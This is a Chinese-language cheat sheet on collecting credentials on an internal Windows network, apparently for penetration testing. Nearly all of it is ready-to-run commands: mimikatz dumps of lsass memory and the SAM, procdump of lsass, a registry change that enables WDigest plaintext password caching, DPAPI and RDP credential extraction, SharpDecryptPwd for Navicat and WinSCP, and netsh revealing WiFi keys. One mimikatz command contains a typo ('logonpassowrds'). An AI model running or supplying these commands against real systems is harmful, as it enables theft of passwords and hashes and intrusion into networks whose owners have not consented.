内网用户凭证收集
获取域内单机密码和哈希值
在线读取lsass进程内存
上传mimikatz到目标主机。
1
| mimikatz.exe "privilege::debug" "sekurlsa::logonpassowrds full " exit
|
离线读取lsass内存文件
上传procdump,将lsass.exe的内存导出为lsass.dmp映像:
1
| procdump.exe -accepteula -ma lsass.exe lsass.dmp
|
mimikatz分析:
1
| mimikatz.exe "sekurlsa::minidump C:\Users\S\Desktop\lsass.dmp" "sekurlsa::logonpasswords full" exit
|
Winserver2012及以上开启WDigest功能,需要用户注销或重新登录才能获取密码明文。
1
2
3
4
|
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
|
在线读本地SAM
1
| mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" exit
|
cmd5解密即可。
离线注册表导出SAM
1
2
3
| reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive
mimikatz.exe "lsadump::sam /sam:sam.hive /system:system.hive" exit
|
cmd5解密即可。
获取常见应用软件凭据
RDP
1
2
3
4
| cmdkey /list
dir /a %USERPROFILE%\AppData\Local\Microsoft\Credentials\*
mimikatz.exe "privilege::debug" "dpapi::cred /in:%USERPROFILE%\AppData\Local\Microsoft\Credentials\F3D52AEECC8AEE52FC2A608E9C17229C" exit
mimikatz.exe "privilege::debug" "sekurlsa::dpapi" exit
|
浏览器
这工具一堆bug,只能说一言难尽,
Navicat
1
| SharpDecryptPwd.exe Navicat
|
Winscp
1
| SharpDecryptPwd.exe WinSCP
|
WiFi
Win
1
2
| netsh wlan show profiles
netsh wlan show profile 配置文件名 key=clear
|
